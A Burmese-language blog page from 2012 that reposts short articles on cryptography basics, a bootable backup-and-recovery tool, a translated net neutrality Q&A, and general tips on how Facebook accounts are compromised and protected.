cryptography ဟာ cryptology နဲ့cryptanalysis စတဲ့ ဘာသာရပ်တွေနဲ့ နီးကပ်စွာ ဆက်စပ်လျက် ရှိပါတယ်။ cryptography မှာစာသားနဲ့ ရုပ်ပုံတွေပေါ်စေတဲ့ microdots နည်းပညာနဲ့ သတင်းအချက်အလက်တွေကို storage ပြုလုပ်ပြီးတော့ဖြစ်စေ၊ လွှဲပြောင်းပြီးတော့ဖြစ်စေ၊ ခြေရာ ဖျောက်နိုင်တဲ့နည်းလမ်းတွေ ပါဝင်ပါတယ်။

ကွန်ပျူတာ နည်းပညာကို အဓိကသုံးစွဲလာတဲ့ ဒီနေ့ခေတ်မှာ cryptography နည်းပညာဟာ ပုံမှန်စာသား plaintext တွေကို ciphertext အဖြစ်ပြောင်းလဲစေတဲ့ (encryption) ခေါ် အချက်အလက် လုံခြုံရေးလုပ်ဆောင်ချက် ဖြစ်စဉ်နဲ့ ဆက်နွယ်နေတက်ပါတယ်။ ciphertext အဖြစ်ကနေ plaintext အဖြစ်ပြန်ပြောင်းတာကိုတော့ decryption လို့ခေါ်ပါတယ်။
Cryptography ရဲ့အဓိက အားသာချက် (၄) ရပ်ကတော့
၁။ Confidentiality
သတင်းအချက်အလက်ကိုမသက်ဆိုင်သူ၊မရည်ညွှန်းခံရသူတွေနားမလည်နိုင်ခြင်း။
၂။ Integrity
သတင်း အချက်အလက်ကို ပေးဖို့သူနဲ့ ရည်ရွယ်ထားတဲ့ လက်ခံသူအကြားမှာ storage ပြုလုပ်မှု၊ transit ပြုလုပ်မှုတွေကို ၀င်ရောက်ပြုပြင်တာမျိုးတွေကို ထောက်လှမ်း စူးစမ်းနိုင်ခြင်း။
၃။ Non-repudiation
သတင်းအချက်အလက်ကို ပေးပို့တဲ့သူဟာ ယင်း သတင်း အချက်အလက် ကိုဖန်တီးခြင်း၊ ပြုပြင် ပြောင်းလဲခြင်းတွေ ပြုလုပ်ပြီးနောက်ထပ် အဆင့်တစ်ရပ်ကို ရောက်ရှိချိန်မှာ သူရဲ့ ရည်ရွယ်ချက်ကို ငြင်းဆိုမှုမပြုနိုင်ခြင်း။
၎။ Authentication
သတင်းအချက်အလက် ပေးပို့သူနဲ့ လက်ခံသူတို့ ဟာ ၎င်းတို့ရဲ့ ကိုယ်ရေး အချက်အလက်တွေကို ကိုယ်စီကိုယ်ငှ အတည်ပြုနိုင်ပြီး၊ သတင်းအချက်အလက်ရဲ့ ဇစ်မြစ်ကိုလည်း အတည်ပြုနိုင်ခြင်း အစရှိတာတွေပါဝင်ပါတယ်။

အထက်ဖော်ပြပါ စံသတ်မှတ်ချက် တွေအားလုံး (သို့မဟုတ်) တစ်စိတ်တစ်ပိုင်းနဲ့ ကိုက်ညီတဲ့ protocol တွေနဲ့ procedure တွေကို cryptosystem တွေလို့ခေါ်ဆိုပါတယ်။
Cryptosystem တွေဟာ အများနားလည်သလို သင်္ချာလုပ်ထုံး လုပ်နည်းတွေ၊ ကွန်ပျူတာ ပရိုဂရမ်တွေမျှသာ မဟုတ်ပါဘူး။ ၎င်းတို့မှာမှန်းဆရခက်တဲ့ password တွေရွေးချယ်ရခြင်း၊ အသုံးမပြုတဲ့ system တွေကို log-off ပြုလုပ်ခြင်း၊ အရေးကြီးတဲ့ procedure တွေကို မသက်ဆိုင်သူတွေနဲ့ မဆွေးနွေးခြင်း စတဲ့လူသားတစ်ဦးရဲ့ လုပ်ဆောင်ချက်တွေကို လည်းဆောင်ရွက်ပေးပါတယ်။ (burmait.net မှ ကူးယူဖော်ပြသည်။)

အပြည့်အစုံ

ကွန်ပျူတာ တစ်ခုလုံးကို recover ဘယ်လိုလုပ်မှာလဲ

မီးအား မမှန်တာကြောင့် ဖြစ်ဖြစ်၊ virus တွေကိုက်လို့ ပြန်ဖွင့် မရတော့တာကြောင့် ဖြစ်ဖြစ် ကွန်ပျူတာကို ဘယ်လိုမှ ဖွင့်လို့ မရတော့ဘူး၊
အထဲမှာလဲ အရေးကြီးတဲ့ သတင်းအချက်အလက်တွေ အများကြီး ရှိနေတယ်ဆိုရင် ဘယ်လိုလုပ်မှာလဲ။

သေချာတာတော့ အဲဒီကွန်ပျူတာကို format ချရတော့မှာပဲ။ မချခင် တစ်ချက် စဉ်းစားပါအုံး၊ လုပ်လို့ရတဲ့ နည်းလမ်းလေးရှိတယ်။

အဲဒါကတော့ Redo Backup and Recovery ဟာ Backup Software လေးပေါ့။ ဒီဟာလေးကို CD နှင့် ဖြစ်ဖြစ် Stick နှင့် ဖြစ်ဖြစ် ဆောင်ထားရင် လိုအပ်တဲ့အခါ အချိန် ၁၀ မိနစ်အတွင်း အရေးကြီးတဲ့ data တွေကို လုံခြုံစိတ်ချရတဲ့ နေရာမှာ Backup လုပ်ပြီးသား ဖြစ်မှာပါ။ RB & R က Bootable ဖြစ်တယ်။ Windows OS ဖြစ်ဖြစ် Linux OS ဖြစ်ဖြစ၊် ဘယ် OS နှင့်ပဲ ဖြစ်ဖြစ် သုံးလို့ရတယ် ပြီးတော့ GPL လိုင်စင်နှင့် ထုတ်ထားတာ ဖြစ်တဲ့အတွက်ကြောင့် ကိုယ်ပိုင်ပဲ သုံးသုံး၊ လုပ်ငန်းမှာ အခကြေးငွေ ယူပြီးတော့ပဲ သုံးသုံး တရားဝင် software ဖြစ်တယ်။

RB & R ဟာ install လုပ်စရာမလိုဘူး ထည့်လိုက်ပြီး စက်ဖွင့်တာနှင့် Computer ရဲ့ Hard disk ထဲကို ပြန်တင်လို့ ရတယ်။ ကွန်ပျူတာကို Network ချိတ်လို့ရသလို CD နှင့် USB လည်း ထည့်လို့ရတယ်။ Internet ပါ သုံးလို့ရတယ် ဖျက်ပြီးသား ဖိုင်တွေကို ပြန်ကြည့်လို့ရသလို ပြန်ကူးထားလို့ရတယ်။

ဒီ software ဟာ 75 MB ပဲရှိတဲ့အတွက်ကြောင့် USB နှင့်ဖြစ်ဖြစ်၊ CD နှင့်ဖြစ်ဖြစ် သိမ်းထားပြီး ယူသွားလို့ရတယ်။

ဘာကြောင့် တခြား Backup Software တွေထက် ကောင်းရသလဲဆိုတော့ GPL လိုင်စင်နှင့်ဖြစ်တာရယ်၊ လိုင်စင်အတွက်ကြောင့် ကန့်သတ်တာမျိုး မရှိတာရယ်၊ ဘယ် OS နှင့် မဆို အသုံးပြုနိုင်တာရယ်၊ Hard disk ထဲကို username တွေ password တွေ မလိုဘဲနဲ့ ၀င်လို့ရတာရယ်၊ ပြီးတော့ အချိန် ၁၀ မိနစ်လောက် နှင့် backup လုပ်လို့ ရနိုင်တာကြောင့်ဖြစ်တယ်။
(burmait.net မှ ကူးယူဖော်ပြသည်။)

အပြည့်အစုံ

အင်တာနက်လွတ်လပ်မှုသဘော Net neutrality အကြောင်း

ကနေ့ကာလရဲ့ နည်းပညာနဲ့ဆက်သွယ်ရေးကဏ္ဍ communictions sector မှာ မူဝါဒရေးရာနဲ့ပတ်သက်လို့ အငြင်းအခုံအဖြစ်ရဆုံး ဝေါဟာရဟာ net neutrality ဆိုတဲ့ စကားစုဖြစ်လို့လာနေပါတယ်။
Net neutrality ဆိုတဲ့ဝေါဟာရမှာ net ကတော့ “အင်တာနက်ကွန်ရက်ကြီး” တစ်ခုလုံးကိုရည်ညွှန်းတာဖြစ်ပြီး၊ neutrality ဆိုတာကိုတော့ “ဘက်မလိုက်မှု၊ ကြားနေမှု” စတဲ့ အနက်သဘောတွေနဲ့သုံးကြတာပါ။ ဒီစကားစုကို “အင်တာနက်ကြားနေမှု” လို့လည်း ဟိုတစ်ပတ်က အင်တာနက်ဆောင်းပါးတစ်စောင်မှာ စမ်းသပ်ပြန်ဆိုသုံးစွဲခဲ့ပါသေးတယ်။ ဒါပေမယ့် စာဖတ်ပရိသတ်ကို အရည်လည်၊ သဘောပေါက်ဖို့ ခက်နေဦးမှာပါ။ ဒါကြောင့်ဒီအင်တာဗျူးမှာတော့ net neutrality ဆိုတာကို လက်ရှိအင်တာနက်အရေးအသားများပေါ်မှာ သုံးစွဲနေတဲ့အနက်ရင်းနဲ့ နီးစပ်မှုအရှိဆုံးဖြစ်အောင်၊ “အင်တာနက်လွတ်လပ်မှုသဘော” လို့ ပြန်ဆိုလိုက်ပါတယ်။ ယခုဖော်ပြမယ့် အမေးအဖြေတွေကတော့ net neutrality ဆိုတာဘာလဲဆိုတဲ့ မေးခွန်းနဲ့စထားတယ်။ Google Verizon တို့ရဲ့မကြာမီက ပူးတွဲအဆိုပြချက် ပေါ်လစီချမှတ်သူခေါင်းဆောင်များအတွက် အင်တာနက်ကို ထိန်းချုပ်ဖို့ကိစ္စပါဝင်သလို၊ AT & T, Comcast, Verizon တို့လို service provider ကုမ္ပဏီကြီးတွေနဲ့ အင်တာနက်ကွန်ရက်ရဲ့ အတားအဆီးမရှိ လွတ်လပ်မှုပင်ကိုယ်သဘောထားကို ထိန်းသိမ်းချင်တဲ့ လစ်ဘရယ်အုပ်စုများရဲ့အငြင်းအခုံတွေကိုပါ ရောင်ပြန်ဟပ်ထားပါတယ်။

Q Net neutrality ဆိုတာ ဘာလဲ။ 
A ဒီဝေါဟာရရဲ့အဓိပ္ပာယ်ကို ရှင်းရှင်းလင်းလင်းဖွင့်ဆို ဖော်ပြကြတာတော့မရှိသေးဘူး။ ဒါပေမယ့် လူတော်တော်များများအတွက်ကတော့ ဒီဝေါဟာရရဲ့အဓိပ္ပာယ်က “အင်တာနက်အသုံးပြုသူတွေဟာ Web ပေါ်က service နဲ့ content တွေကိုအကန့်အသတ်မူမရှိဘဲ ချိတ်ဆက်သုံးစွဲနိုင်တယ်၊ သုံးသင့်တယ်” လို့ပဲ ရိုးရိုးအဓိပ္ပာယ်ထွက်တယ်။ တခြားနည်းနဲ့ပြောရရင်တော့ broadband service provider တွေကို အင်တာနက်ဆက်သွယ်မှုကိုနှေးအောင်လုပ်ခွင့်ပေးတာ တစ်ချို့သော content တွေကို ပိတ်ဆို့ (block) လုပ်တာမျိုးကို ခွင့်မပြုသင့်ဘူးလို့ဆိုတာပါ။ (အမေးအဖြေကအရေးကြီးလို့ မူရင်းကိုပါ တွဲလျက်ဖော်ပြပါရစေ။ ဘာသာပြန်သူ) Q Whar is Net neutrality? A There is no clear definition of the phrase "Net neutrality". But to most people it simply means that Internet users should be able to have unfettered access to content and services on the web. In other words, broadband service providers should not be allowed to monkey with the traffic to block certain content or slow it down.

Q အင်တာနက်ကို ပွင့်လင်းလွတ်လပ်အောင် open ဖြစ်အောင် ထိန်းသိမ်းပေးထားတဲ့ ဥပဒေစည်းမျဉ်းစည်းကမ်းတွေ မရှိဘူးလား။ 
A မရှိပါ။ Broadband provider တွေကို သူတို့ရဲ့ network တွေပေါ်မှာ ဘာလုပ်နိုင်၊ ဘာမလုပ်နိုင်ဘူးဆိုတာကို သီးသန့်ပြောထား၊ ရေးထားတဲ့ ဥပဒေသို့မဟုတ် အရေးယူဆောင်ရွက်နိုင်တဲ့ စည်းမျဉ်းစည်းကမ်းတွေ တစ်ခါမှမရှိခဲ့ပါဘူး။ တစ်ချို့ဥပဒေတွေကတော့ အဆိုပြုထားတုန်း၊ ဒါပေမယ့် အားလုံးကလည်း ဒီအဆင့်မှာပဲ ပျက်ကုန်တာပါ။ ဖက်ဒရယ်ဆက်သွယ်ရေးကော်မရှင် (FCC) ကတော့ Net neutrality principle ဆိုပြီး ရေးထားတာတွေရှိတယ်။ ဒါပေမယ့် အဲဒါတွေကလည်း တရားဝင်စည်းမျဉ်းတွေရယ်တော့ မဟုတ်ပါဘူး။ FCC ဟာယခုတော့ အခိုင်အမာဆောင်ရွက်နိုင်၊ အရေးယူပြဌာန်းနိုင်တဲ့ တရားဝင်ချမှတ်ထားတဲ့ ဥပဒေစည်းမျဉ်းတွေ ရေးဆွဲဖို့လုပ်နေပါတယ်။

Q Net neutrality အငြင်းအခုံကိစ္စထဲမှာ Googleနဲ့ Verizon တို့ ဘာကြောင့်ပါဝင်နေတာလဲ။ 
A Google နဲ့ Versizon တို့ဟာ FCC နဲ့ ဥပဒေပြုအမတ်တွေဆီမှာ အဆိုပြုချက်ဥပဒေကြမ်း proposal တစ်ခုရှိခဲ့ပါတယ်။ ဒါဟာ အဆိုပြုချက်သက်သက်ပါပဲ။ FCC အာဏာပိုင်တွေနဲ့ ဥပဒေပြုအမတ်တွေကတော့ ဒီကိစ္စနဲ့ပတ်သက်လို့ ဥပဒေကြမ်းတရပ်ဆွဲနိုင်ဖို့ သူတို့ရဲ့အဆိုပြုတောင်းဆိုချက်တွေကို ထည့်သွင်းစဉ်းစားမလား၊ မစဉ်းစားဘူးလားဆိုတာ ဆုံးဖြတ်ရမှာပါ။ Google နဲ့ Verizon Service provider တွေဟာသူတို့ရဲ့ network တွေပေါ်မှာလည်ပတ်နေတဲ့ အချို့သော appliction တွေအတွက် အပိုဝန်ဆောင်ခကောက်ခံမလား၊ မကောက်ခံဘူးလားဆိုတာပါ။ ၀ိုင်ယာလက်စ်ကွန်ရက် တွေကို Net neutrality စည်းမျဉ်းကနေ ဖယ်ထုတ်သင့်၊ မသင့်ဆိုတာပါ။

Q ဒါဆို ဘာဥပဒေမှ လောလောဆယ်မရှိသေးဘူးဆိုရင်၊ လက်ရှိကျွန်တော်တို့သုံးနေတဲ့ အင်တာနက်ဆိုတာ မလွတ်လပ်ဘူးဆိုတဲ့သဘောလား။ 
A ဒါလည်း “လွတ်လပ်တယ်” ဆိုတာကို ခင်ဗျားဘယ်လိုအဓိပ္ပာယ်ဖွင့်သလဲဆိုတဲ့အပေါ် မူတည်ပါတယ်။ စားသုံးသူအများစုကတော့ သူတို့မှာ ဘာပြဿနာမှမရှိဘူးပြောကြတယ်။ သူတို့ရဲ့ broadband နှေးအောင်လုပ်တာ သို့မဟုတ် ပိတ်ဆို့ (block) တာ မရှိကြပါဘူး။ သူတို့ဟာအင်တာနက်ပေါ်မှာ လွတ်လပ်စွာသွားနိုင်ပြီး မည်သည့် အင်တာနက်အသုံးပြုရတဲ့ application ကိုမဆို သူတို့ရဲ့ broadband connection တွေပေါ်မှာ လွတ်လပ်စွာသုံးနိုင်ကြပါတယ်။ ဗီဒီယိုတွေကြည့်နိုင်တယ်။ Skype လို third party ကြည့်ရင်တော့ net ဆိုတာလွတ်လပ်တယ်ပေါ့။ ဒါပေမယ့်ဒါက service provider တွေဟာ အင်တာနက် traffic ကို မစီမံမခန့်ခွဲဘူး။ ဦးစားပေးမလုပ်ဆောင်ဘူးလို့ ဆိုလိုတာတော့မဟုတ်ဘူး။ Broadband service provider တွေဟာ မြေပေါ်မှာဖိုင်ဘာလိုင်း၊ ကြေးနန်းလိုင်းတွေကနေ သို့မဟုတ် လေလှိုင်းကနေစသဖြင့် ဘယ်လိုပဲ service ပေးနေသည်ဖြစ်ပါစေ၊ သူတို့ဟာ ကိုယ့်ရဲ့ network တွေကိုစီမံနိုင်ရပါမယ်။ အင်တာနက်ပေါ်မှာ information တွေကို သယ်ဆောင်ပို့ပေးခြင်းနဲ့ပတ်သက်လို့ အသုံးပြုနေတဲ့ Internet Protocol ဆိုတာဟာလည်း အကောင်းဆုံး အားထုတ်မှုတစ်ခုပါပဲ။ ၎င်းက network တလျှောက်မှာ information packet တွေကိုပို့ပေးတယ်။ ဒီ information တွေအားလုံးဟာလည်း Speed အမျိုးမျိုး၊ တစ်ခါတစ်လေ လမ်းကြောင်းအမျိုးမျိုးနဲ့ သွားနေပါတယ်။ ဒီ packet အမျိုးမျိုးဟာလည်း သူတို့ရဲ့ပန်းတိုင်နေရာကိုရောက်ရင် ပြန်စုစည်းရတယ်။ ဒါဟာ network ရင်းမြစ်တွေအတွက် အလွန်ထိရောက်တဲ့ အသုံးပြုမှုပါ။ ဒါပေမယ့် ဟိုင်းဝေးလမ်းတွေပေါ်သွားနေတဲ့ ကားတွေလိုပေါ့။ တစ်ချို့ packet တွေဟာလည်း သွားနေစဉ်မှာ ပိတ်ဆို့မှုဖြစ်တာတွေ ကြုံရတတ်ပါတယ်။ လူတွေကတော့ text-based packet တွေနှောင့်နှေးတာကို သတိမထားမိတတ်ကြပါဘူး။ ဒါပေမယ့် အဲဒါတွေမှာ အချိန်သတ်မှတ်ချက်နဲ့ သွားရတဲ့ဒေတာတွေဖြစ်ကြတဲ့ Voice call လို့၊ Vidoe Stream လုပ်တာမျိုးတွေလိုပါတယ်ဆိုရင် နှေးကွေးတာ၊ ပိတ်ဆို့မှုဖြစ်နေတာကို ကြုံရမှာပါ။ ဒီတော့ ဒေတာတွေစီးဆင်းနေမှုအားလုံးကို အချိန်မီ စနစ်တကျသွားလာနေစေဖို့ network operator တွေဟာ စီခံခန့်ခွဲမှုနည်းတွေနဲ့ တက္ကနိုလိုဂျီတွေကို ကားလမ်းတွေမှာ လမ်းပြရဲတွေကအဆင်ပြေအောင်လုပ်ပေးသလိုမျိုး လုပ်ဆောင်ပေးရပါတယ်။ Network operator တွေဟာ ဒီတက္ကနိုလိုဂျီတွေကို သုံးလာတာ နှစ်ပေါင်းများစွာကြာခဲ့ပါပြီ။ သူတို့ရဲ့ network တွေမှာပိတ်ဆို့မှု traffic တွေများလာလေ traffic management နည်းလမ်းတွေပါသုံးပြီး ဖြေရှင်းပေးရလေပါပဲ။ AT & T နဲ့ Verizon လိုကုမ္ပဏီမျိုးတွေက ပြောနေတာကလည်း သူတို့ရဲ့ network တွေကိုထိန်းချုပ်ဖို့ဆိုတာဟာ subscriber တွေအားလုံးအတွက် အဲဒီလို traffic တွေမကြုံအောင် စနစ်တကျစီမံနိုင်ရေးပါ။

Q ဒါဆို အင်တာနက်လွတ်လပ်မှုသဘော Net neutrality ကိုထောက်ခံသူတွေက ဘာတွေကို ကြောက်နေတာလဲ။ 
A ဒါနဲ့ပတ်သက်လို့ ပုံစံကျဥပဒေစည်းမျဉ်းတွေမရှိဘဲ broadband provider တွေက သူတို့ရဲ့ စွမ်းအားကို မတရားအသုံးချကြမှာ ကြောက်ကြလို့ပါ။ Traffic ဖြစ်နေတာတွေကို ထိန်းချုပ်ဖို့အတွက် သူတို့ရဲ့ management technique တွေကိုသုံးရမယ့်အစား၊ net ပေါ်မှာ ပြိုင်ဘက် provider တွေရဲ့ serviceတွေကို သုံးနေတဲ့ user တွေရဲ့ connection တွေကို နှောင့်နှေးအောင်လုပ်မှာစိုးလို့ပါ။ ဥပမာပြောရရင် ခင်ဗျားရဲ့ broadband provider က video service ပေးနေတယ်ဆိုပါတော့။ ဒါဆိုရင် ခင်ဗျားရဲ့ကုမ္ပဏီက network ပေါ်မှာတော့ ပြိုင်ဖက်ကုမ္ပဏီရဲ့ video service ထက်ခင်ဗျားအတွက် service ကိုပဲ ဦးတည်ပေးဖို့ ကြိုးစားကောင်းကြိုးစားတော့မှာပဲ။ ဒီလိုဖြစ်တာနဲ့ အဲဒီပြိုင်ဘက်ကုမ္ပဏီရဲ့ service ဟာလည်း နှောင့်နှေးသွားပြီး၊ ခင်ဗျားကုမ္ပဏီအတွက်ပဲ ပိုကောင်းတော့မှာပေါ့။ နောက်ထပ်ကြောက်ကြတာတစ်ခုကတော့ broadband service provider တွေဟာ content နဲ့ application developer တွေနဲ့ပူးပေါင်းပြီး စာချုပ်ချုပ်ဆိုမှာ၊ netbased service အင်တာနက်အခြေခံဝန်ဆောင်မှု အားလုံးတိုင်းဟာလည်း connection ပိုကောင်းချင်ရင် ငွေပိုပေးရမယ်ဆိုတာမျိုးဖြစ်လာမှာကို ကြောက်ကြတာပါ။ ဒါဆိုရင်လူတိုင်းသုံးနိုင်တဲ့ public Internet ဟာ နှေးကွေးတဲ့၊ ဘာမှသုံးလို့မရတဲ့ content တွေပဲပေးတော့မှာပေါ့။

Q ဒါဆို net neutrality အငြင်းခုံဟာ နောက်ဆိုဘာဖြစ်လာနိုင်မလဲ။ 
A နိုဝင်ဘာမှာ အမေရိကန်ကွန်ရက်ရွေးကောက်ပွဲတွေရှိတာမို့ အဲဒီမတိုင်ခင်တော့ ဘာမှဖြစ်ဦးမှာမဟုတ်ပါဘူး။ လောလောဆယ်မှာတော့ FCC ရော service provider တွေရော၊ ထောက်ခံသူ၊ ဆန့်ကျင်သူတွေအားလုံးဟာ ၀ိုင်ယာလတ်စ် network တွေအတွက် Net neutrality rule တွေကို သုံးသပ်ဆင်ခြင်နေရတုန်းပါ။ FCC ရဲ့ဥက္ကဌ ဂျူးလီယပ်စ်ဂီနာချောစကီးကတော့ ဒီလိုပြောထားတယ်။ “အားလုံးမြင်တဲ့အတိုင်းပါပဲ။ ကိစ္စတွေကတော့ ထွေပြားရှုပ်ထွေးပြီး၊ အသေးစိတ်ကျပါတယ်။ အရေးယူဆောင်ရွက်နိုင်မယ့် ဥပဒေတွေပြဌာန်းနိုင်ဖို့ အဆိုပြုချက်ဥပဒေကြမ်းတစ်ခုလုပ်တာတောင်မှ အားနည်းချက်ကလေးတွေရှိနေပြီး၊ လွတ်လပ်ပွင့်လင်းတဲ့ opern Internet ဖြစ်ရေး အခြေခံရည်မှန်းချက်ကို အန္တရာယ်ဖြစ်စေနိုင်တာတွေ ပါနေဆဲဖြစ်ပါတယ်။”
Source: www.myanmarinternetjournal.com

အပြည့်အစုံ

Thursday 20 December 2012

ဖေ့ဘုတ်အကောင့် ဟက်(Hack)ခံရလျှင်...


Q: Can I get hacked in Facebook?

A : Facebook မှာ သတိမရှိတဲ့သူတွေသာ ဟက်ခံရတတ်မြဲပါ။ အကောင့်တစ်ခုကို ဟက်တဲ့အပိုင်းတွေက အများကြီးရှိပါတယ်။ အခြေအနေအထားအရပါ။ နှစ်ပိုင်းခွဲပြီးပြောကြတာပေါ့… ပထမတခုက Public ပါ။ နောက်တခုက Private ပါ၊ Public ဆိုတာ လူအများတကာ Share လုပ်တဲ့ဟာကို ပြောတာပါ… (ဥပမာ … ကွန်ပြုတာ ဆိုင်။ ကျောင်းသုံးကွန်ပြုတာ။ နောက် သူများကွန်ပြုတာလို့ လဲပြောလို့ ရပါတယ်) Private ဆိုတာ ကိုယ့်ဟာကိုယ် သုံးတဲ့စက်ပေါ့ဗျာ…

တကယ်လို့ သာ ကွန်ပြုတာ သုံးသူဟာ ၁) Public ကို သုံးတဲ့သူဟာ.. သူ့ အကောင့်ကို ၁၀၀% ဘယ်တော့မှ secure မဖြစ်ပါဘူး… ဥပမာ အင်တာနက်ဆိုင်ဆိုပါတော့ အင်တာနက်ဆိုင်က ကွန်ပြုတာတွေဟာ ဘယ်တော့ မှ ၁၀၀% clean မဟုတ်ပါ။ သူတို့ က ပိုက်ဆံရလျှင် သုံးလို့ ရအောင် သတ်သတ်သာဖွင့်ထားကြတာ သုံးတာတောင် License ရှိတဲ့ ဟာတွေ မရှိတာကများပါတယ်။ ဒါပေမယ့် လူတိုင်းကိုင် လူတိုင်းသုံးတော့ဗျာ Keylogger တွေခံရတတ်သလို Virus တွေလည်းခံရတတ်ပါတယ်၊
အင်တာနက်ဆိုင် လက်ဖက်ရည်ဆိုင်က WIFI ဘဲ သုံးတယ်ဘဲထား… LAN/Wifi ကနေသုံးတဲ့သူရဲ့  Secure Session တွေကို Hijack လုပ်ပါက သင့်အကောင့်ကို ယူသုံးလို့ ရတတ်ပါတယ်၊ (Secure Session ကို Hijack ဆိုတော့ Password တော့ သူတို့ မရနိုင်ပါ… အကောင့် ၀င်နေတဲ့အချိန်ပိုင်းသာ ရနိုင်ပါတယ်. အကောင့်ထွက်သွားလျှင် သူတို့ လဲသုံးလို့ မရပါ)
အင်တာနက်ဆိုင်ကို ထိုင်လျှင်တော့ ၁၀၀% Secure မဖြစ်ပေမဲ့ အင်တာနက်ဆိုင်က လူတွေ ညစ်ပတ်ပြီး Keylogger/Malware တွေ လုပ်ထားရင်တော့ ခံရတတ်ပါတယ်၊ ဒါပေမယ့် တချို့ သော Keylogger တွေကတော့ UTF စာဖြစ်တဲ့ မြန်မာစာတွေကို Log လုပ်တာ အဆင်မပြေပါဘူး။ Keylog ရရင်လည်း ပြန်ပြီး Encoding လုပ်ရပါတယ်။ သာမန်အဆင့်မရှိတဲ့ Script Kiddies တွေက ပြန်ပြီး Encoding လုပ်လို့ မရနိုင်ပါ၊ ဒါဆိုရင် ကိုယ့် Password ကို မြန်မာစာဖြင့် ပေးလို့ ရနိုင်ပါတယ်၊ (သတိပြုရန် = တခါတလေ.. ကိုယ့်ပြောင်းထားတော့ မြန်မာစာ Password နဲ့  ရိုက်တဲ့အခါ English နဲ့ ဝင်လျှင် မှားတတ်ကြတာတွေသတိပြုပါ၊ မြန်မာစာနဲ့ ရေးထားတဲ့ Password ကိုသာ ရေးထည့်ပြီး ၀င်ကြည့်ပါ)
Public Lan ဘဲဖြစ်ဖြစ် Public WIFI ဘဲဖြစ်ဖြစ်သုံးတဲ့လူတွေကတော့ VPN ကိုသုံးပါက မသာမှာသူက Sniffing လုပ်တဲ့အခါ Packages တွေ Session တွေကို Hijacked မလုပ်နိုင်ပါ၊ ကဲ VPN ဘဲသုံးကြပါ တကယ်လို့  သင်ဟာ သူများ Public WIFI ကို သုံးလျှင်၊
Private က လူတွေကို ဟက်ခံရပြီဆိုရင်တော့ အဲဒီလူဟာ EXE သို့ မဟုတ် ကွန်ပြုတာထဲကို Download လုပ်ပြီး သွင်းတဲ့ Malware တခုခုကြောင့် ဖြစ်နိုင်သလို Phishing link ကို သွားပြီး password ရိုက်ပေးပြီး ၀င်မိတာတို့ ကြောင့် ဖြစ်တတ်ပါတယ်၊
Facebook မှာ နောက်တခုက Download မလုပ်ဘဲခံရတတ်ကတော့ Facebook App ပါ။ ပေါက်တတ်ကရ Facebook App တွေကို Account နဲ့  Link လုပ်ခြင်းဖြင့် ခံရတတ်ပါတယ်၊ တခါတလေ မြင်မှာပါ Spam တွေ ကိုယ်မတင်ဘဲ ကိုယ်အစားတင်ပေးတဲ့ Post တွေ… post အောက်ဘက်မှာ တွေ့ မှာပါ Via this app name ဆိုတာတွေ။ မသိတဲ့လူတွေကတော့ သူများ လုပ်တိုင်း App တွေသွင်းလျှင် ကိုယ်လည်းသွင်းလုပ်လျှင် သူများခံသလို ကိုယ်လည်းခံရတတ်ပါတယ်၊ App တွေကို ဒီနေရာမှ Remove လုပ်နိုင်ပါတယ် http://www.facebook.com/settings?tab=applications ။ ယုံကြည်ရတဲ့ App ကို သုံးရင်တော့ ဘာမှမဖြစ်ဘူးပေါ့ဗျာ၊ တကယ်လို့  App က Spam လုပ်ပြီဆိုလျှင် အဲဒီ App ကို Report လုပ်ပြီး Remove လုပ်ထားလိုက်ပါ၊
နောက်တခုကတော့ သူငယ်ချင်း ၃ ယောက်နည်းပါဘဲ၊ လူတွေ လာလာ အပ်တိုင်း ကိုယ့်ဟာကိုယ် နာမည်ကြီးနေပြီလို့  မထင်ပါနဲ့  ။ ကိုယ့်ကို လူတိုင်းသိနေပြီလို့  မထင်ပါနဲ့ ၊ ကိုယ့်ကိုယ်အမြင်ကတ်လို့  အလွတ်ဆုံးနည်းလမ်းဖြင့် လာရောက် Friend request လုပ်ပြီးနောက် စကားပြောဟန်ဆောင်ပြီးလုပ်က Password reset ချနိုင်တယ်ဆိုတာ သတိပြုပါ၊ ဒါပေမယ့် အမြဲတမ်း Online မှာ တက်နေတဲ့ သူတွေအတွက် ဘာမှ မဖြစ်နိုင်ပါ၊ ပြီးတော့ Account အတွက် Security Question ကို ချထားသူများအတွက် ပိုပြီးကောင်းပါတယ်၊ ဘာဖြစ်လို့ လဲဆိုတော့ Security Question က Password recovery လုပ်တဲ့အခါအရင်မေးတတ်ပါတယ်၊ တကယ်လို့  ပထမဆုံးသူတို့  Security Question မမှန်ကန်ပါက သူတို့  Three Friends Steps ကို သွားခွင့်မပေးပါဘူး။ Security Question Disable ဖြစ်မှသွားမှသာ Three Friends Selection ကို ရနိုင်မှာဖြစ်ပါတယ်၊ Three Friends Selection ကို ရသွားရင်တောင် ၂၄ နာရီလုံးလုံး အချိန်စောင့်နေရမှာဖြစ်ပါတယ်၊
EXE တွေ File တွေ ပြီးတော့ Phishing Link တွေကို မသာမှာသူများက လာရောက်ပြောဆိုသွားတာကို ယုံကြည့်လို့  လုပ်မိသူများသာ ခံရတတ်ပါတယ်၊
ရှင်းရှင်း ပြောရလျှင် ဟိုမရ ဒီမရကောင်လေးတွေ ဘာမှန်းမသိ Hacking ကိုလုပ်နေတယ်ဆိုသူတွေက အများကြီး အဲဒီနေရာမှာ ခံရမြဲပါ၊ သာမန်လူနဲ့  အဲဒီလိုလူ နှစ်ယောက်ကို ဟက်မယ်ဆိုရင်ဟိုမကျ ဒီမကျ Hacking ဆိုတဲ့ စကားပြောနေတဲ့ကောင်လေးကို အရင်ဟက်လို့ ရနိုင်ပါတယ်၊
ဘာဖြစ်လို့ လဲဆိုတော့ အဲလိုလူတွေကို အယုံသတ်ရတာ လွယ်သလို .. ဟေ့ဒီမှာ ဟိုဟာကို Hack လို့ ရတဲ့ Tools ကို သုံးကြည့်ပါလားဆိုပြီး ထိုးထည့်လိုက်ရင် သူ့ တို့ ကတော့ ကိုယ့်ဟာကို ဆရာကြီးလို လုပ်ပြီး Fake Ware ကို သွားပြီး Download လုပ်ပြီး ဖွင့်ကြည့်ပါက ခံရတတ်မြဲပါ၊ သာမန်လူမှာက အဲလိုဟာမျိုးတွေက မလိုတာ၊ ဘာလုပ်မှာလဲ အချိန်ကုန်ခံပြီးတော့လေ၊
